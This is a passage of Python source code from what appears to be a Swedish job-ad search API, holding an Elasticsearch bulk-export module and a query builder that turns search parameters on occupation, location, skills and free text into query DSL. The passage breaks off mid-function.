{
"source": "JobtechSwe/castaway",
"score": 2
}
#### File: castaway/bulkloader/repository.py
```python
import datetime
import logging
import json
import time
import zipfile
from flask_restx import Namespace
from datetime import date, timedelta
from io import BytesIO
from elasticsearch.helpers import scan
from sokannonser import settings
from sokannonser.repository import elastic
from sokannonser.rest.model.result_models import job_ad
from sokannonser.repository.querybuilder import calculate_utc_offset
log = logging.getLogger(__name__)
marshaller = Namespace('Marshaller')
offset = calculate_utc_offset()
def _es_dsl():
dsl = {
"query": {
"bool": {
"filter": [
{
"range": {
"publication_date": {
"lte": "now/m+%dH/m" % offset
}
}
},
{
"range": {
"last_publication_date": {
"gte": "now/m+%dH/m" % offset
}
}
}
]
}
},
}
return dsl
def zip_ads(day, start_time=0):
if start_time == 0:
start_time = int(time.time() * 1000)
dsl = _es_dsl()
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
if day == 'all':
dsl['query']['bool']['must'] = [{"match_all": {}}]
else:
ts_from = convert_to_timestamp('%sT00:00:00' % str(day))
ts_to = convert_to_timestamp('%sT23:59:59' % str(day))
dsl['query']['bool']['must'] = [{
"range": {
"timestamp": {
"gte": ts_from,
"lte": ts_to
}
}
}]
log.debug('zip_ads, dsl: %s' % dsl)
scan_result = scan(elastic, dsl, index=index)
in_memory = BytesIO()
zf = zipfile.ZipFile(in_memory, "w", zipfile.ZIP_DEFLATED)
ads = [ad['_source'] for ad in scan_result]
log.debug("Number of ads: %d" % len(ads))
zf.writestr(f"ads_{day}.json", json.dumps(ads))
zf.close()
in_memory.seek(0)
log.debug("File constructed after %d milliseconds."
% (int(time.time() * 1000) - start_time))
return in_memory
def _index_exists(idx_name):
return elastic.indices.exists_alias(name=[idx_name]) \
or elastic.indices.exists(index=[idx_name])
def convert_to_timestamp(day):
if not day:
return None
ts = 0
for dateformat in [
'%Y-%m-%dT%H:%M:%S'
]:
try:
ts = time.mktime(time.strptime(day, dateformat)) * 1000
log.debug("Converted date %s to %d" % (day, ts))
break
except ValueError as e:
log.debug("Failed to convert date %s" % day, e)
return int(ts)
# Generator function
def load_all(args):
since = args.get(settings.DATE)
    # optional end of the time span; falls back to settings.MAX_DATE below
if args.get(settings.UPDATED_BEFORE_DATE, None):
before = args.get(settings.UPDATED_BEFORE_DATE)
else:
before = datetime.datetime.strptime(settings.MAX_DATE, '%Y-%m-%dT%H:%M:%S')
    # 'yesterday' is not accepted by type=inputs.datetime_from_iso8601, so translate it here
if since == 'yesterday':
since = (date.today() - timedelta(1)).strftime('%Y-%m-%d')
ts = int(time.mktime(since.timetuple())) * 1000
# add 1 sec to find ad (ms truncation problem)
bets = int(time.mktime(before.timetuple())+1) * 1000
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
log.debug("Elastic index(load_all): % s" % index)
dsl = _es_dsl()
dsl['query']['bool']['must'] = [{
"range": {
"timestamp": {
"gte": ts,
"lte": bets
}
}
}]
occupation_concept_ids = args.get(settings.OCCUPATION_CONCEPT_ID)
if occupation_concept_ids:
occupation_list = [occupation + '.' + 'concept_id.keyword' for occupation in settings.OCCUPATION_LIST]
add_filter_query(dsl, occupation_list, occupation_concept_ids)
location_concept_ids = args.get(settings.LOCATION_CONCEPT_ID)
if location_concept_ids:
location_list = ['workplace_address.' + location + '_concept_id' for location in settings.LOCATION_LIST]
add_filter_query(dsl, location_list, location_concept_ids)
log.debug('QUERY(load_all): %s' % json.dumps(dsl))
scan_result = scan(elastic, dsl, index=index)
counter = 0
yield '['
for ad in scan_result:
if counter > 0:
yield ','
source = ad['_source']
if source.get('removed', False):
yield json.dumps(format_removed_ad(source))
else:
yield json.dumps(format_ad(source))
counter += 1
log.debug("Delivered %d ads as stream" % counter)
yield ']'
def add_filter_query(dsl, items, concept_ids):
# add occupation or location filter query
should_query = []
for concept_id in concept_ids:
if concept_id:
for item in items:
should_query.append({"term": {
item: concept_id
}})
dsl['query']['bool']['filter'].append({"bool": {"should": should_query}})
return dsl
@marshaller.marshal_with(job_ad)
def format_ad(ad_data):
return ad_data
# @marshaller.marshal_with(removed_job_ad)
def format_removed_ad(ad_data):
if ad_data.get('occupation', None):
occupation = ad_data.get('occupation', None).get('concept_id', None)
else:
occupation = None
if ad_data.get('occupation_group', None):
occupation_group = ad_data.get('occupation_group', None).get('concept_id', None)
else:
occupation_group = None
if ad_data.get('occupation_field', None):
occupation_field = ad_data.get('occupation_field', None).get('concept_id', None)
else:
occupation_field = None
if ad_data.get('workplace_address', None):
municipality = ad_data.get('workplace_address', None).get('municipality_concept_id', None)
region = ad_data.get('workplace_address', None).get('region_concept_id', None)
country = ad_data.get('workplace_address', None).get('country_concept_id', None)
else:
municipality = None
region = None
country = None
return {
'id': str(ad_data.get('id')),
'removed': ad_data.get('removed'),
'removed_date': ad_data.get('removed_date'),
'occupation': occupation,
'occupation_group': occupation_group,
'occupation_field': occupation_field,
'municipality': municipality,
'region': region,
'country': country
}
def load_snapshot():
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
dsl = _es_dsl()
dsl['query']['bool']['filter'].append({"term": {"removed": False}})
    log.debug('QUERY(load_snapshot): %s' % json.dumps(dsl))
scan_result = scan(elastic, dsl, index=index)
counter = 0
yield '['
for ad in scan_result:
if counter > 0:
yield ','
source = ad['_source']
yield json.dumps(format_ad(source))
counter += 1
log.debug("Delivered %d ads as stream" % counter)
yield ']'
```
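A minimal sketch (not part of the repository) of how these two entry points are typically consumed: `load_all` yields fragments of one JSON array and fits a streaming Flask `Response` (exactly what `bulkloader/rest/bulk.py` does further down), while `zip_ads` returns an in-memory zip as a `BytesIO`. The import path and the plain dict standing in for reqparse-parsed args are assumptions.
```python
# Illustrative only. Assumes the package layout from the file header above
# (bulkloader.repository) and uses a plain dict in place of parsed request args.
import datetime

from flask import Flask, Response

from bulkloader import repository
from sokannonser import settings

app = Flask(__name__)


@app.route('/stream-example')
def stream_example():
    # load_all() expects a dict-like object; settings.DATE maps to a datetime.
    args = {settings.DATE: datetime.datetime(2021, 1, 1)}
    return Response(repository.load_all(args), mimetype='application/json')


def dump_one_day(day='2021-01-01'):
    # zip_ads() returns a BytesIO positioned at the start of the archive.
    with open(f'ads_{day}.zip', 'wb') as f:
        f.write(repository.zip_ads(day).getbuffer())
```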
#### File: sokannonser/repository/querybuilder.py
```python
import json
import logging
import re
import time
from collections import defaultdict
from datetime import datetime, timedelta
import elasticsearch_dsl
from dateutil import parser
from sokannonser import settings
from sokannonser.repository import taxonomy, TextToConcept
from sokannonser.rest.model import queries
from sokannonser.rest.model import fields as f
log = logging.getLogger(__name__)
class QueryBuilder(object):
def __init__(self, text_to_concept=TextToConcept(ontologyhost=settings.ES_HOST,
ontologyport=settings.ES_PORT,
ontologyuser=settings.ES_USER,
ontologypwd=settings.ES_PWD)):
self.ttc = text_to_concept
self.occupation_collections = taxonomy.fetch_occupation_collections()
def parse_args(self, args, x_fields=None):
"""
Parse arguments for query and return an elastic query dsl
Keyword arguments:
args -- dictionary containing parameters from query
"""
query_dsl = self._bootstrap_query(args, x_fields)
# Check for empty query
if not any(v is not None for v in args.values()) \
or not args.get(settings.CONTEXTUAL_TYPEAHEAD, True):
log.debug("Constructing match-all query")
query_dsl['query']['bool']['must'].append({'match_all': {}})
if 'sort' not in query_dsl:
query_dsl['sort'] = [f.sort_options.get('pubdate-desc')]
return query_dsl
must_queries = list()
# bool args
abroad = self._parse_boolean_arg(args.get(settings.ABROAD))
unspecified_workplace = self._parse_boolean_arg(args.get(settings.UNSPECIFIED_SWEDEN_WORKPLACE))
remote = self._parse_boolean_arg(args.get(settings.REMOTE))
drivers_licence = self._parse_boolean_arg(args.get(taxonomy.DRIVING_LICENCE_REQUIRED))
experience = self._parse_boolean_arg(args.get(settings.EXPERIENCE_REQUIRED))
must_queries.append(
self._build_freetext_query(args.get(settings.FREETEXT_QUERY),
args.get(settings.FREETEXT_FIELDS),
args.get(settings.X_FEATURE_FREETEXT_BOOL_METHOD),
args.get(settings.X_FEATURE_DISABLE_SMART_FREETEXT),
args.get(settings.X_FEATURE_ENABLE_FALSE_NEGATIVE, False)))
must_queries.append(self._build_employer_query(args.get(settings.EMPLOYER)))
must_queries.append(self._build_yrkes_query(args.get(taxonomy.OCCUPATION),
args.get(taxonomy.GROUP),
args.get(taxonomy.FIELD)))
must_queries.append(self.build_yrkessamlingar_query(args.get(taxonomy.COLLECTION)))
must_queries.append(self._filter_timeframe(args.get(settings.PUBLISHED_AFTER),
args.get(settings.PUBLISHED_BEFORE)))
must_queries.append(self._build_parttime_query(args.get(settings.PARTTIME_MIN),
args.get(settings.PARTTIME_MAX)))
must_queries.append(self._build_plats_query(args.get(taxonomy.MUNICIPALITY),
args.get(taxonomy.REGION),
args.get(taxonomy.COUNTRY),
unspecified_workplace,
abroad))
must_queries.append(self._build_remote_plats_query(remote))
must_queries.append(self._build_generic_query([f.MUST_HAVE_SKILLS + "." +
f.CONCEPT_ID + ".keyword",
f.MUST_HAVE_SKILLS + "." +
f.LEGACY_AMS_TAXONOMY_ID,
f.NICE_TO_HAVE_SKILLS + "." +
f.CONCEPT_ID + ".keyword",
f.NICE_TO_HAVE_SKILLS + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.SKILL)))
must_queries.append(self._build_generic_query([f.MUST_HAVE_LANGUAGES + "." +
f.CONCEPT_ID + ".keyword",
f.MUST_HAVE_LANGUAGES + "." +
f.LEGACY_AMS_TAXONOMY_ID,
f.NICE_TO_HAVE_LANGUAGES + "." +
f.CONCEPT_ID + ".keyword",
f.NICE_TO_HAVE_LANGUAGES + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.LANGUAGE)))
must_queries.append(self._build_generic_query([f.WORKING_HOURS_TYPE + "." +
f.CONCEPT_ID + ".keyword",
f.WORKING_HOURS_TYPE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.WORKTIME_EXTENT)))
must_queries.append(self._build_generic_query([f.DRIVING_LICENCE + "." +
f.CONCEPT_ID + ".keyword",
f.DRIVING_LICENCE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.DRIVING_LICENCE)))
must_queries.append(self._build_generic_query([f.EMPLOYMENT_TYPE + "." +
f.CONCEPT_ID + ".keyword",
f.EMPLOYMENT_TYPE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.EMPLOYMENT_TYPE)))
if isinstance(drivers_licence, bool):
must_queries.append(
{"term": {
f.DRIVING_LICENCE_REQUIRED: drivers_licence
}}
)
# TODO: Maybe check if NO skills are listed in ad instead?
if isinstance(experience, bool):
must_queries.append({"term": {f.EXPERIENCE_REQUIRED: experience}})
filter_queries = list()
geo_filter = self._build_geo_dist_filter(args.get(settings.POSITION),
args.get(settings.POSITION_RADIUS))
filter_queries.append(geo_filter)
query_dsl = self._assemble_queries(query_dsl, must_queries, filter_queries)
for stat in args.get(settings.STATISTICS) or []:
query_dsl['aggs'][stat] = {
"terms": {
"field": f.stats_options[stat],
"size": args.get(settings.STAT_LMT) or 5
},
"aggs": {
"id_and_name": {
"top_hits": {
"size": 1,
"_source": {"includes": [f.stats_concept_id_options[stat], f.stats_concept_name_options[stat]]}
}
}
}
}
return query_dsl
@staticmethod
def filter_aggs(aggs, freetext):
        # will not be used in the future
fwords = freetext.split(' ') if freetext else []
value_dicts = []
for agg in aggs:
if agg.startswith('complete_'):
value_dicts += [{"type": agg[12:], **bucket}
for bucket in aggs[agg]['buckets']]
filtered_aggs = []
value_list = []
for kv in sorted(value_dicts, key=lambda k: k['doc_count'], reverse=True):
found_words = kv['key'].split(' ')
value = ' '.join([w for w in found_words if w not in fwords])
if kv['key'] not in fwords and value not in value_list:
ac_hit = {
"value": value,
"found_phrase": kv['key'],
"type": kv['type'],
"occurrences": kv['doc_count']
}
value_list.append(value)
filtered_aggs.append(ac_hit)
if len(filtered_aggs) > 50:
return filtered_aggs[0:50]
return filtered_aggs
def _parse_x_fields(self, x_fields):
# Remove all spaces from field
x_fields = re.sub(r'\s', '', x_fields).lower()
if 'hits{' in x_fields:
# Find out which fields are wanted
hitsfields = self._find_hits_subelement(x_fields)
# Remove lower nestings
hitsfields = re.sub("[{].*?[}]", "", hitsfields)
fieldslist = hitsfields.split(',')
if f.AD_URL in fieldslist:
fieldslist.append('id')
return fieldslist
return []
@staticmethod
def _find_hits_subelement(text):
        istart = []  # stack of indices of opening braces
bracket_positions = {}
for i, c in enumerate(text):
if c == '{':
istart.append(i)
if c == '}':
try:
bracket_positions[istart.pop()] = i
except IndexError:
pass
idx = text.find('hits{') + 4
r = text[idx + 1:bracket_positions[idx]]
return r
def _bootstrap_query(self, args, x_fields):
query_dsl = dict()
query_dsl['from'] = args.pop(settings.OFFSET, 0)
query_dsl['size'] = args.pop(settings.LIMIT, 10)
# No need to track all results if used for typeahead
if not args.get(settings.TYPEAHEAD_QUERY):
query_dsl['track_total_hits'] = True
query_dsl['track_scores'] = True
if args.pop(settings.DETAILS, '') == queries.OPTIONS_BRIEF:
query_dsl['_source'] = [f.ID, f.HEADLINE, f.APPLICATION_DEADLINE,
f.EMPLOYMENT_TYPE + "." + f.LABEL,
f.WORKING_HOURS_TYPE + "." + f.LABEL,
f.EMPLOYER_NAME,
f.PUBLICATION_DATE]
if x_fields:
query_dsl['_source'] = self._parse_x_fields(x_fields)
# Remove api-key from args to make sure an empty query can occur
if settings.APIKEY in args:
args.pop(settings.APIKEY)
# Make sure to only serve published ads
offset = calculate_utc_offset()
query_dsl['query'] = {
'bool': {
'must': [],
'filter': [
{
'range': {
f.PUBLICATION_DATE: {
'lte': 'now+%dH/m' % offset
}
}
},
{
'range': {
f.LAST_PUBLICATION_DATE: {
'gte': 'now+%dH/m' % offset
}
}
},
{
'term': {
f.REMOVED: False
}
},
]
},
}
query_dsl['aggs'] = {
"positions": {
"sum": {"field": f.NUMBER_OF_VACANCIES}
}
}
complete_string = args.get(settings.TYPEAHEAD_QUERY)
complete_fields = args.get(settings.FREETEXT_FIELDS)
if not complete_fields:
complete_fields = queries.QF_CHOICES.copy()
complete_fields.remove('employer')
complete_string = self._rewrite_word_for_regex(complete_string)
word_list = complete_string.split(' ')
complete = word_list[-1]
ngrams_complete = []
for n in list(range(len(word_list) - 1)):
ngrams_complete.append(' '.join(word_list[n:]))
size = 60 / len(complete_fields)
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
for field in complete_fields:
base_field = f.KEYWORDS_EXTRACTED \
if field in ['employer'] else enriched_typeahead_field
query_dsl['aggs']["complete_00_%s" % field] = {
"terms": {
"field": "%s.%s.raw" % (base_field, field),
"size": size,
"include": "%s.*" % self._escape_special_chars_for_complete(complete)
}
}
x = 1
for ngram in ngrams_complete:
if ngram != complete:
query_dsl['aggs']["complete_%s_%s_remainder" % (str(x).zfill(2), field)] = {
"terms": {
"field": "%s.%s.raw" % (base_field, field),
"size": size,
"include": "%s.*" % self._escape_special_chars_for_complete(ngram)
}
}
x += 1
if args.get(settings.SORT) and args.get(settings.SORT) in f.sort_options.keys():
query_dsl['sort'] = f.sort_options.get(args.pop(settings.SORT))
else:
query_dsl['sort'] = f.sort_options.get('relevance')
return query_dsl
@staticmethod
def _parse_boolean_arg(arg):
if isinstance(arg, bool):
return arg
elif isinstance(arg, str):
if arg.lower() == 'true':
return True
elif arg.lower() == 'false':
return False
else:
return arg
else:
return arg
@staticmethod
def _escape_special_chars_for_complete(inputstr):
escaped_str = inputstr
chars_to_escape = ['#']
for char in chars_to_escape:
if char in inputstr:
escaped_str = inputstr.replace(char, '[%s]' % char)
return escaped_str
@staticmethod
def _assemble_queries(query_dsl, additional_queries, additional_filters):
for query in additional_queries:
if query:
query_dsl['query']['bool']['must'].append(query)
for af in additional_filters:
if af:
query_dsl['query']['bool']['filter'].append(af)
return query_dsl
@staticmethod
def _rewrite_word_for_regex(word):
if word is None:
word = ''
bad_chars = ['+', '.', '[', ']', '{', '}', '(', ')', '^', '$',
'*', '\\', '|', '?', '"', '\'', '&', '<', '>']
if any(c in bad_chars for c in word):
modded_term = ''
for c in word:
if c in bad_chars:
modded_term += '\\'
modded_term += c
return modded_term
return word
@staticmethod
def extract_quoted_phrases(text):
text = ' '.join([w.strip(',!?:;\' ') for w in re.split('\\s|\\,', text)])
if text.count('"') == 1:
if text[:1] == '"':
text += '"'
else:
text = text.strip('"')
must_matches = re.findall(r'\+\"(.+?)\"', text)
neg_matches = re.findall(r'\-\"(.+?)\"', text)
for neg_match in neg_matches:
text = re.sub('-"%s"' % neg_match, '', text)
for must_match in must_matches:
text = re.sub(r'\+"%s"' % must_match, '', text)
matches = re.findall(r'\"([^\"]+?)\"', text)
for match in matches:
text = re.sub(r'\"*%s\"*' % QueryBuilder._rewrite_word_for_regex(match), '', text)
return {"phrases": matches, "phrases_must": must_matches,
"phrases_must_not": neg_matches}, text.strip()
# Parses FREETEXT_QUERY and FREETEXT_FIELDS
def _build_freetext_query(self, querystring, queryfields, freetext_bool_method,
disable_smart_freetext, enable_false_negative=False):
if not querystring:
return None
if not queryfields:
queryfields = queries.QF_CHOICES.copy()
(phrases, querystring) = self.extract_quoted_phrases(querystring)
original_querystring = querystring
concepts = {} if disable_smart_freetext else self.ttc.text_to_concepts(querystring)
querystring = self._rewrite_querystring(querystring, concepts)
ft_query = self._create_base_ft_query(querystring, freetext_bool_method)
# Make all "musts" concepts "shoulds" as well
for qf in queryfields:
if qf in concepts:
                must_key = "%s_must" % qf  # e.g. 'occupation_must', matching the concept keys used by text_to_concepts
concepts[qf] += [c for c in concepts.get(must_key, [])]
# Add concepts to query
for concept_type in queryfields:
sub_should = self._freetext_concepts({"bool": {}}, concepts,
[concept_type], "should", enable_false_negative)
if 'should' in sub_should['bool']:
if 'must' not in ft_query['bool']:
ft_query['bool']['must'] = []
ft_query['bool']['must'].append(sub_should)
# Remove unwanted concepts from query
self._freetext_concepts(ft_query, concepts, queryfields, 'must_not', enable_false_negative)
# Require musts
self._freetext_concepts(ft_query, concepts, queryfields, 'must', enable_false_negative)
self._add_phrases_query(ft_query, phrases)
freetext_headline = phrases.get('phrases', [])
ft_query = self._freetext_headline(ft_query, freetext_headline, original_querystring)
return ft_query
# Add phrase queries
@staticmethod
def _add_phrases_query(ft_query, phrases):
for bool_type in ['should', 'must', 'must_not']:
key = 'phrases' if bool_type == 'should' else "phrases_%s" % bool_type
for phrase in phrases[key]:
if bool_type not in ft_query['bool']:
ft_query['bool'][bool_type] = []
ft_query['bool'][bool_type].append({"multi_match":
{"query": phrase,
"fields": ["headline", "description.text"],
"type": "phrase"}})
return ft_query
# Removes identified concepts from querystring
def _rewrite_querystring(self, querystring, concepts):
# Sort all concepts by string length
all_concepts = sorted(concepts.get('occupation', []) +
concepts.get('occupation_must', []) +
concepts.get('occupation_must_not', []) +
concepts.get('skill', []) +
concepts.get('skill_must', []) +
concepts.get('skill_must_not', []) +
concepts.get('location', []) +
concepts.get('location_must', []) +
concepts.get('location_must_not', []),
key=lambda c: len(c),
reverse=True)
# Remove found concepts from querystring
for term in [concept['term'] for concept in all_concepts]:
term = self._rewrite_word_for_regex(term)
p = re.compile(f'(^|\\s+)(\\+{term}|\\-{term}|{term})(\\s+|$)')
querystring = p.sub('\\1\\3', querystring).strip()
# Remove duplicate spaces
querystring = re.sub('\\s+', ' ', querystring).strip()
return querystring
def _create_base_ft_query(self, querystring, method):
method = 'and' if method == 'and' else settings.DEFAULT_FREETEXT_BOOL_METHOD
# Creates a base query dict for "independent" freetext words
# (e.g. words not found in text_to_concepts)
suffix_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('*')])
prefix_words = ' '.join([w[:-1] for w in querystring.split(' ')
if w and w.endswith('*')])
inc_words = ' '.join([w for w in querystring.split(' ')
if w and not w.startswith('+')
and not w.startswith('-') and not w.startswith('*')
and not w.endswith('*')])
req_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('+')
and w[1:].strip()])
exc_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('-')
and w[1:].strip()])
shoulds = self._freetext_fields(inc_words, method) if inc_words else []
musts = self._freetext_fields(req_words, method) if req_words else []
mustnts = self._freetext_fields(exc_words, method) if exc_words else []
ft_query = {"bool": {}}
# Add "common" words to query
if shoulds or musts or prefix_words or suffix_words:
ft_query['bool']['must'] = []
if shoulds:
# Include all "must" words in should, to make sure any single "should"-word
# not becomes exclusive
if 'must' not in ft_query['bool']:
ft_query['bool']['must'] = []
ft_query['bool']['must'].append({"bool": {"should": shoulds + musts}})
        # Add wildcards after the shoulds so they do not end up in the should clause
if prefix_words:
musts += self._freetext_wildcard(prefix_words, "prefix", method)
if suffix_words:
musts += self._freetext_wildcard(suffix_words, "suffix", method)
if musts:
ft_query['bool']['must'].append({"bool": {"must": musts}})
if mustnts:
ft_query['bool']['must_not'] = mustnts
return ft_query
@staticmethod
def _freetext_fields(searchword, method=settings.DEFAULT_FREETEXT_BOOL_METHOD):
return [{
"multi_match": {
"query": searchword,
"type": "cross_fields",
"operator": method,
"fields": [f.HEADLINE + "^3", f.KEYWORDS_EXTRACTED + ".employer^2",
f.DESCRIPTION_TEXT, f.ID, f.EXTERNAL_ID, f.SOURCE_TYPE,
f.KEYWORDS_EXTRACTED + ".location^5"]
}
}]
@staticmethod
def _freetext_wildcard(searchword, wildcard_side, method=settings.DEFAULT_FREETEXT_BOOL_METHOD):
return [{
"multi_match": {
"query": searchword,
"type": "cross_fields",
"operator": method,
"fields": [f.HEADLINE + "." + wildcard_side,
f.DESCRIPTION_TEXT + "." + wildcard_side]
}
}]
@staticmethod
def _freetext_headline(query_dict, freetext_headline, querystring):
# Remove plus and minus from querystring for headline search
freetext_headline = ' '.join(
['"' + re.sub(r'(^| )[\\+]{1}', ' ', string) + '"' for string in freetext_headline])
querystring = freetext_headline + re.sub(r'(^| )[\\+]{1}', ' ', querystring)
if 'must' not in query_dict['bool']:
query_dict['bool']['must'] = []
for should in query_dict['bool']['must']:
log.info(should)
try:
match = {
"match": {
f.HEADLINE + ".words": {
"query": querystring.strip(),
"operator": "and",
"boost": 5
}
}
}
if 'should' in should.get('bool', {}):
should['bool']['should'].append(match)
except KeyError:
log.error("No bool clause for headline query")
return query_dict
def _freetext_concepts(self, query_dict, concepts,
concept_keys, bool_type, enable_false_negative=False):
for key in concept_keys:
dict_key = "%s_%s" % (key, bool_type) if bool_type != 'should' else key
current_concepts = [c for c in concepts.get(dict_key, []) if c]
for concept in current_concepts:
if bool_type not in query_dict['bool']:
query_dict['bool'][bool_type] = []
base_fields = []
if key == 'location' and bool_type != 'must':
base_fields.append(f.KEYWORDS_EXTRACTED)
base_fields.append(f.KEYWORDS_ENRICHED)
# Add freetext search for location that does not exist
# in extracted locations, for example 'kallhäll'.
value = concept['term'].lower()
if value not in self.ttc.ontology.extracted_locations:
geo_ft_query = self._freetext_fields(value)
query_dict['bool'][bool_type].append(geo_ft_query[0])
elif key == 'occupation' and bool_type != 'must':
base_fields.append(f.KEYWORDS_EXTRACTED)
base_fields.append(f.KEYWORDS_ENRICHED)
else:
curr_base_field = f.KEYWORDS_EXTRACTED \
if key in ['employer'] else f.KEYWORDS_ENRICHED
base_fields.append(curr_base_field)
for base_field in base_fields:
if base_field == f.KEYWORDS_EXTRACTED:
value = concept['term'].lower()
boost_value = 10
else:
value = concept['concept'].lower()
boost_value = 9
field = "%s.%s.raw" % (base_field, key)
query_dict['bool'][bool_type].append(
{
"term": {
field: {
"value": value,
"boost": boost_value
}
}
}
)
if enable_false_negative and base_field == f.KEYWORDS_ENRICHED and (
key == 'skill'):
# Add extra search for the current known term in headline, employer and description to be sure
# not to miss search hits where the term wasn't identified during enrichment. Only search
# skills to avoid irrelevant hits on occupations and locations...
query_dict['bool'][bool_type].append(
{'multi_match': {
'query': concept['term'].lower(),
'type': 'cross_fields',
'operator': 'and',
'fields': [
'headline^0.1',
'keywords.extracted.employer^0.1',
'description.text^0.1'
]
}}
)
return query_dict
# Parses EMPLOYER
@staticmethod
def _build_employer_query(employers):
if employers:
bool_segment = {"bool": {"should": [], "must_not": [], "must": []}}
for employer in employers:
negative_search = employer.startswith('-')
positive_search = employer.startswith('+')
bool_type = 'should'
if negative_search or positive_search:
employer = employer[1:]
bool_type = 'must_not' if negative_search else 'must'
if employer.isdigit():
bool_segment['bool'][bool_type].append(
{"prefix": {f.EMPLOYER_ORGANIZATION_NUMBER: employer}}
)
else:
bool_segment['bool'][bool_type].append(
{
"multi_match": {
"query": " ".join(employers),
"operator": "or",
"fields": [f.EMPLOYER_NAME,
f.EMPLOYER_WORKPLACE]
}
}
)
return bool_segment
return None
    # Parses OCCUPATION, GROUP and FIELD
@staticmethod
def _build_yrkes_query(yrkesroller, yrkesgrupper, yrkesomraden):
yrken = yrkesroller or []
yrkesgrupper = yrkesgrupper or []
yrkesomraden = yrkesomraden or []
yrke_term_query = [{
"term": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 2.0}}} for y in yrken if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 2.0}}} for y in yrken if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 1.0}}} for y in yrkesgrupper if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 1.0}}} for y in yrkesgrupper if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 1.0}}} for y in yrkesomraden if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 1.0}}} for y in yrkesomraden if y and not y.startswith('-')]
neg_yrke_term_query = [{
"term": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrken if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrken if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrkesgrupper if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrkesgrupper if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrkesomraden if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrkesomraden if y and y.startswith('-')]
if yrke_term_query or neg_yrke_term_query:
query = {'bool': {}}
if yrke_term_query:
query['bool']['should'] = yrke_term_query
if neg_yrke_term_query:
query['bool']['must_not'] = neg_yrke_term_query
return query
else:
return None
    # Parses COLLECTION (occupation collections)
def build_yrkessamlingar_query(self, yrkessamlingar):
start_time = int(time.time() * 1000)
if not yrkessamlingar:
return None
yrken_in_yrkessamlingar_id = []
neg_yrken_in_yrkessamlingar_id = []
        # Parse yrkessamlingar from the search input and add the occupations they contain to yrken_in_yrkessamlingar_id
for yrkessamling in yrkessamlingar:
if yrkessamling:
# If negative filter on yrkessamling:
if str(yrkessamling).startswith('-'):
neg_yrkessamling = yrkessamling[1:]
if neg_yrkessamling in self.occupation_collections:
neg_yrken_in_yrkessamlingar_id += self.occupation_collections.get(
neg_yrkessamling)
# If positive filter on yrkessamling:
else:
if yrkessamling in self.occupation_collections:
yrken_in_yrkessamlingar_id += self.occupation_collections.get(yrkessamling)
if yrken_in_yrkessamlingar_id or neg_yrken_in_yrkessamlingar_id:
query = {'bool': {}}
if yrken_in_yrkessamlingar_id:
query['bool']['should'] = {
"terms": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword":
yrken_in_yrkessamlingar_id}
}
if neg_yrken_in_yrkessamlingar_id:
query['bool']['must_not'] = {
"terms": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword":
neg_yrken_in_yrkessamlingar_id}
}
log.debug("Occupation-collections Query results after %d milliseconds."
% (int(time.time() * 1000) - start_time))
return query
else:
return None
    # Parses MUNICIPALITY, REGION and COUNTRY
@staticmethod
def _build_plats_query(kommunkoder, lanskoder, landskoder, unspecify, abroad):
kommuner = []
neg_komm = []
lan = []
neg_lan = []
land = []
neg_land = []
for kkod in kommunkoder if kommunkoder else []:
if kkod.startswith('-'):
neg_komm.append(kkod[1:])
else:
kommuner.append(kkod)
for lkod in lanskoder if lanskoder else []:
if lkod.startswith('-'):
neg_lan.append(lkod[1:])
else:
lan.append(lkod)
for ckod in landskoder if landskoder else []:
if ckod.startswith('-'):
neg_land.append(ckod[1:])
else:
land.append(ckod)
plats_term_query = [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CODE: {
"value": kkod, "boost": 2.0}}} for kkod in kommuner]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CONCEPT_ID: {
"value": kkod, "boost": 2.0}}} for kkod in kommuner]
        # When the unspecified flag is true, return all ads in Sweden that lack a region (unspecified workplace)
if unspecify:
plats_term_query += [
{
